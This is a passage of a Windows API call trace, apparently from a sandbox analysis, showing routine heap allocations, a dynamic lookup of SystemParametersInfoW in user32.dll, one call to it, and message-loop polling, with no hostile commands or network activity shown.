0x34aa508 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0308.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0308.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0308.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0308.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0308.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0308.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0308.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0308.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0308.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0308.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0308.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0308.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0308.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0308.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0308.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0308.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0308.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0308.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0308.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0308.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0308.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0308.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0308.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0308.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0308.532] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0308.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0308.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0308.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0308.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0308.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0308.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0308.534] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0308.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0308.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0308.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0308.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.535] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0308.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0308.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0308.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0308.672] FreeLibrary (hLibModule=0x74f40000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0308.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0308.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0308.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0308.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0308.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0308.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0308.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0308.677] 